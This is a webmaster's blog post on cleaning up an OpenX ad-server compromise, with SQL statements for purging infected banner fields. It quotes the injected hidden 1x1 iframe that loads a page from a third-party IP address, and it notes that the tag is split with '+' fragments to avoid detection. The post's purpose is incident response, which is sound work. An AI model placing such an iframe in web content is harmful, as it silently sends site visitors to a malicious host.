OpenX – security problem with malware hack

It hit me cold when I saw the virus scanner's red warning pop up on the screen. Administering www.weimar.de, it is no fun having a virus warning on the front page of an official website.

The cause was OpenX, version 2.8.1, which I updated to 2.8.5; that came too late, since the database was already affected. I found this code within my banner JS:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

That is a 1×1, borderless, non-scrolling iframe that silently loads a page from a third-party host; the visitor never sees it. The "+" fragments come from the JavaScript string the delivery script writes, so the tag does not look like a plain <iframe> in the served source, even though that is what gets injected into the page.

I checked the PHP files, above all these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

and found nothing. Check them anyway, because in some cases the injection sits directly in those files (at the very beginning or the end); comparing the first and last lines with a clean copy of the same OpenX version is the quickest way to spot it.

So I checked my database, the table phpads_banners (or openx_banners, depending on your table prefix), and found nothing obvious. The malicious code is hidden within the BLOB fields, whose content phpMyAdmin only displays if you enable it, so there is one thing you can do: empty these fields:

  • prepend
  • append
  • htmlcache
  • htmltemplate

Be aware that this also wipes legitimate content: htmltemplate holds the code of your HTML banners, and append/prepend hold any extra code you attached to banners (tracking pixels and the like). Back the table up first and re-enter those afterwards.

I rigorously cleared out all the sh*t with this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;
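A more careful variant of the same cleanup, added here as an example and not taken from the original post: back the table up, find the rows that actually carry the injected iframe, and clear only those, so banners that were never touched keep their HTML templates and append/prepend codes. It assumes MySQL, the table name phpads_banners and the four column names from the statement above, and a primary key column called bannerid (an assumption about the OpenX schema). The host 194.8.250.211 and the path tds/in.cgi are the indicators from the injected code shown earlier.

```sql
-- Added example, not the original post's statement.
-- Assumptions: MySQL, table phpads_banners, columns append/prepend/htmltemplate/htmlcache
-- as in the post, and a primary key column bannerid.

-- 1. Back the table up so legitimate HTML banners and append/prepend codes can be restored.
CREATE TABLE phpads_banners_bak AS SELECT * FROM phpads_banners;

-- 2. Review which rows carry the injection. CONCAT_WS skips NULL columns, so a NULL
--    in one field does not hide a match in another. The '%iframe%' clause is only for
--    review: legitimate banners may contain iframes, so it is not used for deletion.
SELECT bannerid,
       LENGTH(htmltemplate) AS htmltemplate_len,
       LENGTH(htmlcache)    AS htmlcache_len,
       LENGTH(append)       AS append_len,
       LENGTH(prepend)      AS prepend_len
FROM phpads_banners
WHERE CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%194.8.250.211%'
   OR CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%tds/in.cgi%'
   OR CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%iframe%';

-- 3. Clear the four fields only on rows that match the known indicators.
UPDATE phpads_banners
SET append = NULL, prepend = NULL, htmltemplate = NULL, htmlcache = NULL
WHERE CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%194.8.250.211%'
   OR CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%tds/in.cgi%';

-- 4. Verify: both counts should now be 0.
SELECT COUNT(*) AS still_infected
FROM phpads_banners
WHERE CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%194.8.250.211%'
   OR CONCAT_WS(' ', htmltemplate, htmlcache, append, prepend) LIKE '%tds/in.cgi%';

-- 5. Restore append/prepend/htmltemplate of the cleared rows by hand from
--    phpads_banners_bak, after removing the iframe from them.
```

Run step 2 first and look at the rows it returns; if the injection points at a different host than the one seen here, add that host to the LIKE clauses in steps 3 and 4 before running them. Because the indicators in the cleared rows were real, the original banner content of those rows still has to be taken from the backup and re-entered without the iframe.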

Good luck!

